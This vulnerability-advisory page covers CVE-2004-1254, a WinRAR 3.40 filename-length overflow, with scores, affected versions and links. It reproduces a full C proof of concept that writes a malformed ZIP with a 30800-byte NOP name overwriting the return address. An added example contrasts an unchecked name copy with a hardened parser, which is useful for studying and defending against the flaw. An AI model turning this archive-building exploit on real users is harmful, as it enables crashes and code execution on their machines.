CVE-2004-1254
CVSS 10.0
Published: 2005-01-10 00:00:00
Revised: 2009-06-13 00:22:40

[Original] WinRAR 3.40, and possibly earlier versions, allows remote attackers to execute arbitrary code via a ZIP file containing a file with a long filename, possibly causing an integer overflow that leads to a buffer overflow.


[CNNVD] rarlab WinRAR buffer overflow vulnerability (CNNVD-200501-074)

        WinRAR is a widely used compression/decompression utility that supports many archive formats.
        WinRAR 3.40 and earlier versions contain an integer overflow vulnerability.
        An attacker can use a ZIP archive containing a file with a long filename to trigger a buffer overflow and execute arbitrary code.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in a complete system outage]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:rarlab:winrar:3.20
cpe:/a:rarlab:winrar:3.10
cpe:/a:rarlab:winrar:3.11
cpe:/a:rarlab:winrar:3.40
cpe:/a:rarlab:winrar:3.10_beta5
cpe:/a:rarlab:winrar:3.0.0
cpe:/a:rarlab:winrar:3.41
cpe:/a:rarlab:winrar:3.10_beta3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1254
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1254
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-074
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/18569
(UNKNOWN)  XF  winrar-zip-file-bo(18569)
http://www.frsirt.com/exploits/20041217.Winrar.c.php
(UNKNOWN)  MISC  http://www.frsirt.com/exploits/20041217.Winrar.c.php

- Vulnerability information

rarlab WinRAR buffer overflow vulnerability
Critical  Buffer overflow
Published: 2005-01-10 00:00:00  Revised: 2009-06-13 00:00:00
Remote

- Advisory and patch

        The vendor has released an upgrade that fixes this issue; it can be obtained from:
        http://www.rarlab.com/download.htm

- Vulnerability information (694)

WinRAR <= 3.4.1 Corrupt ZIP File Vulnerability PoC (EDBID:694)
windows local
2004-12-16 Verified
Vafa Khoshaein
/*
WinRAR 3.40 Buffer Overflow POC
Thanks to Miguel Tarasco Acuna. He has made a wonderful code for
Microsoft Windows Vulnerability in Compressed (zipped) Folders (MS04-034)
which I edited and made this code by.


Coded by Vafa Khoshaein - vkhoshain@hotmail.com
Vulnerability discovery date : December 10, 2004


Run this code and create vulnerable_zip.zip then open the file in WinRAR 3.40
there exists a file, Try to delete the file - SECU


*/
#include <stdio.h>
#include <stdlib.h>   /* malloc, exit */
#include <string.h>   /* memset, memcpy, strlen */
#include <windows.h>  /* DWORD, WORD, UINT */


#pragma pack(1)   /* ZIP headers are unaligned on disk; lay the structs out byte for byte */



#define DATOS "vkhoshain@hotmail.com"


typedef struct {   /* ZIP local file header, 30 bytes */
DWORD Signature;
WORD VersionNeeded;
WORD GeneralPurposeFlag;
WORD CompressionMethod;
WORD ModFileTime;
WORD ModFileDate;
DWORD Crc32;
DWORD CompressedSize;
DWORD UncompressedSize;
WORD FilenameLength;
WORD ExtraFieldLength;
}TOPHEADER;



typedef struct {   /* ZIP central directory file header, 46 bytes */
DWORD Signature;
WORD MadeVersion;
WORD VersionNeeded;
WORD GeneralPurposeFlag;
WORD CompressionMethod;
WORD ModFileTime;
WORD ModFileDate;
DWORD Crc32;
DWORD CompressedSize;
DWORD UncompressedSize;
WORD FilenameLength;
WORD ExtraFieldLength;
WORD FileCommentLength;
WORD DiskNumberStart;
WORD InternalFileAttributes;
DWORD ExternalFileAttributes;
DWORD RelativeOffsetOfLocalHeader;
}MIDDLEHEADER;


typedef struct {   /* ZIP end of central directory record, 22 bytes */
DWORD Signature;
WORD NumOfThisDisk;
WORD NumDisckStartCentralDirectory;
WORD NumEntriesCentralDirOnThisDisk;
WORD TotalNumEntriesCentralDir;
DWORD SizeCentralDirectory;
DWORD OffsetCentraDirRespectStartDiskNum;
WORD ZipCommentLength;
}BOTTOMHEADER;


int main(int argc,char *argv[]) {


FILE *ZipFile;
TOPHEADER *Cabecera1;
MIDDLEHEADER *Cabecera2;
BOTTOMHEADER *Cabecera3;


DWORD c;
UINT i;
char *filename;
char *url;
printf("\nWinRAR 3.40 Buffer Overflow POC\n");
printf("\nCoded by Vafa Khoshaein (vkhoshain@hotmail.com)\n");



if (!(ZipFile=fopen("vulnerable_zip.zip","w+b"))) {
printf("\nError in creating vulnerable_zip.zip\n");
exit(1);
}


/* Filename length: 30800 bytes, far beyond any legitimate path length */
c=30800;
filename=(char*)malloc(sizeof(char)*c);
if(!filename){ printf("\nmalloc failed\n"); fclose(ZipFile); exit(1); }
memset(filename,0,c); /* the published code used sizeof(filename), i.e. the size of the pointer; the loop below fills the buffer anyway */


/* Fill the name with NOPs (0x90) */
for( i=0;i<30800;i++) filename[i]=0x90;


// Return Address: the four bytes at offset 479 of the name overwrite the saved return address (EIP = 0x41414141 on crash)
memcpy(&filename[479],"AAAA",4); /////////// Ret Addr EIP 0x41414141

Cabecera1=(TOPHEADER*)malloc(sizeof(TOPHEADER));
Cabecera2=(MIDDLEHEADER*)malloc(sizeof(MIDDLEHEADER));
Cabecera3=(BOTTOMHEADER*)malloc(sizeof(BOTTOMHEADER));
memset(Cabecera1,0,sizeof(TOPHEADER));
memset(Cabecera2,0,sizeof(MIDDLEHEADER));
memset(Cabecera3,0,sizeof(BOTTOMHEADER));


Cabecera1->Signature=0x00000050; // DWORD - as published; the standard local file header signature is 0x04034B50 ("PK\3\4")
Cabecera1->VersionNeeded=0x000A; // WORD
Cabecera1->GeneralPurposeFlag=0x0002; // WORD
Cabecera1->CompressionMethod=0x0000; // WORD  stored, no compression
Cabecera1->ModFileTime=0x1362; // WORD
Cabecera1->ModFileDate=0x3154; // WORD
Cabecera1->Crc32=0x85B36639; // DWORD
Cabecera1->CompressedSize=0x00000015; // DWORD  21 = strlen(DATOS)
Cabecera1->UncompressedSize=0x00000015; // DWORD
Cabecera1->FilenameLength=(WORD)c; // WORD  30800 = 0x7850
Cabecera1->ExtraFieldLength=0x0000; // WORD
Cabecera2->Signature=0x02014B50; // DWORD
Cabecera2->MadeVersion=0x0014; // WORD
Cabecera2->VersionNeeded=0x000A; // WORD
Cabecera2->GeneralPurposeFlag=0x0002; // WORD
Cabecera2->CompressionMethod=0x0000; // WORD
Cabecera2->ModFileTime=0x1362; // WORD
Cabecera2->ModFileDate=0x3154; // WORD
Cabecera2->Crc32=0x85B36639; // DWORD
Cabecera2->CompressedSize=0x00000015; // DWORD
Cabecera2->UncompressedSize=0x00000015; // DWORD
Cabecera2->FilenameLength=(WORD)c; // WORD  30800 = 0x7850, same oversized name as the local header
Cabecera2->ExtraFieldLength=0x0000; // WORD
Cabecera2->FileCommentLength=0x0000; // WORD
Cabecera2->DiskNumberStart=0x0000; // WORD
Cabecera2->InternalFileAttributes=0x0001; // WORD
Cabecera2->ExternalFileAttributes=0x00000020; // DWORD
Cabecera2->RelativeOffsetOfLocalHeader=0x00000000; // DWORD
Cabecera3->Signature=0x06054B50; // DWORD
Cabecera3->NumOfThisDisk=0x0000; // WORD
Cabecera3->NumDisckStartCentralDirectory=0x0000; // WORD
Cabecera3->NumEntriesCentralDirOnThisDisk=0x0001;
Cabecera3->TotalNumEntriesCentralDir=0x0001;
Cabecera3->SizeCentralDirectory=sizeof(MIDDLEHEADER)+c; // one 46-byte entry plus the 30800-byte name
Cabecera3->OffsetCentraDirRespectStartDiskNum=sizeof(TOPHEADER)+strlen(DATOS)+c; // local header + name + 21 bytes of stored data
Cabecera3->ZipCommentLength=0x0000;


fwrite(Cabecera1, sizeof(TOPHEADER), 1,ZipFile);

fwrite(filename, c, 1,ZipFile);
fwrite(DATOS,strlen(DATOS),1,ZipFile);


fwrite(Cabecera2, sizeof(MIDDLEHEADER), 1,ZipFile);
fwrite(filename, c, 1,ZipFile);
fwrite(Cabecera3, sizeof(BOTTOMHEADER), 1,ZipFile);


fclose(ZipFile);
printf("\nvulnerable_zip.zip has been created\n\n");
return 0;
}

// milw0rm.com [2004-12-16]
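
As an added example (not code from this page, from rarlab, or from the PoC author), the C program below builds an in-memory archive in the same local header / name / data / central directory / EOCD layout the PoC writes, and places the unchecked copy pattern the page describes (a 16-bit FilenameLength from the archive driving a memcpy into a fixed buffer) next to a hardened central-directory reader. The function names, the error codes, and the 260-byte NAME_BUF destination are assumptions for illustration; the field offsets are those of the ZIP format.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the page, from rarlab or from the PoC author.
 * Offsets follow the PKWARE APPNOTE. NAME_BUF is an assumed destination size,
 * picked to resemble a MAX_PATH-style buffer. */
#define NAME_BUF 260u
#define LFH_SIG  0x04034B50u  /* local file header, "PK\3\4" */
#define CDH_SIG  0x02014B50u  /* central directory header, "PK\1\2" */
#define EOCD_SIG 0x06054B50u  /* end of central directory, "PK\5\6" */
#define LFH_LEN  30u
#define CDH_LEN  46u
#define EOCD_LEN 22u

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Constructed input: one stored (method 0) entry whose name is namelen 'A'
 * bytes, written in the same LFH / name / data / CDH / name / EOCD order as
 * the PoC above. Returns the archive size, or 0 if out is too small. */
size_t build_zip(uint8_t *out, size_t cap, uint16_t namelen) {
    static const uint8_t data[5] = {'h', 'e', 'l', 'l', 'o'};
    size_t need = LFH_LEN + namelen + sizeof data + CDH_LEN + namelen + EOCD_LEN;
    if (cap < need) return 0;
    memset(out, 0, need);
    uint8_t *p = out;
    wr32(p, LFH_SIG); wr16(p + 4, 10); wr32(p + 18, sizeof data); wr32(p + 22, sizeof data);
    wr16(p + 26, namelen); p += LFH_LEN;
    memset(p, 'A', namelen); p += namelen;
    memcpy(p, data, sizeof data); p += sizeof data;
    uint32_t cd_off = (uint32_t)(p - out);
    wr32(p, CDH_SIG); wr16(p + 4, 20); wr16(p + 6, 10); wr32(p + 20, sizeof data);
    wr32(p + 24, sizeof data); wr16(p + 28, namelen); p += CDH_LEN;
    memset(p, 'A', namelen); p += namelen;
    uint32_t cd_size = (uint32_t)(p - out) - cd_off;
    wr32(p, EOCD_SIG); wr16(p + 8, 1); wr16(p + 10, 1); wr32(p + 12, cd_size); wr32(p + 16, cd_off);
    return need;
}

/* The unsafe shape: the archive's FilenameLength decides how much is copied;
 * the destination size never enters the picture, so a name of NAME_BUF bytes
 * or more overruns name[]. Shown for contrast only; never call it on untrusted data. */
void copy_name_unchecked(const uint8_t *cdh, char name[NAME_BUF]) {
    uint16_t namelen = rd16(cdh + 28);
    memcpy(name, cdh + CDH_LEN, namelen);
    name[namelen] = '\0';
}

/* Hardened reader. Copies the first entry's name into out and returns the
 * number of entries walked, or a negative code on any inconsistency. Every
 * offset and length taken from the file is checked against the file size and
 * the output buffer before use, and the entry size is summed in size_t: a
 * uint16_t sum of three 16-bit lengths wraps, which is the kind of integer
 * overflow turning into a buffer overflow that the CVE text describes. */
int zip_read_first_name(const uint8_t *zip, size_t len, char *out, size_t outcap) {
    if (len < EOCD_LEN || outcap == 0) return -1;
    /* Find the EOCD: scan back over an optional archive comment of at most 65535 bytes. */
    size_t pos = len - EOCD_LEN;
    size_t stop = len > 65535u + EOCD_LEN ? len - 65535u - EOCD_LEN : 0;
    for (;; pos--) {
        if (rd32(zip + pos) == EOCD_SIG && pos + EOCD_LEN + rd16(zip + pos + 20) == len) break;
        if (pos == stop) return -2;                        /* no well-formed EOCD */
    }
    uint16_t entries = rd16(zip + pos + 10);
    uint32_t cd_size = rd32(zip + pos + 12), cd_off = rd32(zip + pos + 16);
    if (cd_off > pos || cd_size > pos - cd_off) return -3; /* central dir outside the file */
    const uint8_t *cd = zip + cd_off, *end = cd + cd_size;
    int parsed = 0;
    while (parsed < entries) {
        if ((size_t)(end - cd) < CDH_LEN || rd32(cd) != CDH_SIG) return -4;
        uint16_t namelen = rd16(cd + 28), extralen = rd16(cd + 30), commentlen = rd16(cd + 32);
        size_t entry_len = CDH_LEN + (size_t)namelen + extralen + commentlen;
        if (entry_len > (size_t)(end - cd)) return -5;     /* lengths run past the central dir */
        if (parsed == 0) {
            if (namelen >= outcap) return -6;              /* the missing check: the name must fit */
            memcpy(out, cd + CDH_LEN, namelen);
            out[namelen] = '\0';
        }
        cd += entry_len;
        parsed++;
    }
    return parsed;
}

int main(void) {
    static uint8_t small[512], big[70000];
    char name[NAME_BUF];
    size_t n = build_zip(small, sizeof small, 8);
    size_t m = build_zip(big, sizeof big, 30800);         /* the PoC's 30800-byte name */
    copy_name_unchecked(small + LFH_LEN + 8 + 5, name);   /* safe here only because the name is short */
    printf("short name via unchecked copy: %s\n", name);
    printf("short archive: rc=%d\n", zip_read_first_name(small, n, name, sizeof name));
    printf("30800-byte name: rc=%d (rejected instead of overflowing)\n",
           zip_read_first_name(big, m, name, sizeof name));
    return 0;
}
```

Two checks do the work: the name length is compared with the destination capacity before the copy, and the per-entry length is accumulated in size_t and compared with the bytes remaining in the central directory. An ExtraFieldLength of 0xFFFF on an eight-byte name makes the 16-bit sum wrap to 7 and would pass a WORD-sized check, but is rejected here because the size_t total (65589) exceeds the directory.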

- Vulnerability information

12550
WinRAR Delete Archived File Overflow
Local Access Required  Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A local overflow exists in WinRar. WinRar fails to properly validate data resulting in a buffer overflow. When a user deletes a specific file from a specially crafted zip file, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.

- Timeline

Disclosure date: 2004-12-22  Discovery date: 2004-12-10
Exploit publish date: 2004-12-16  Solution date: Unknown

- Solution

The vendor is aware of the vulnerability and has opted not to release a patch until the next scheduled release of the product.

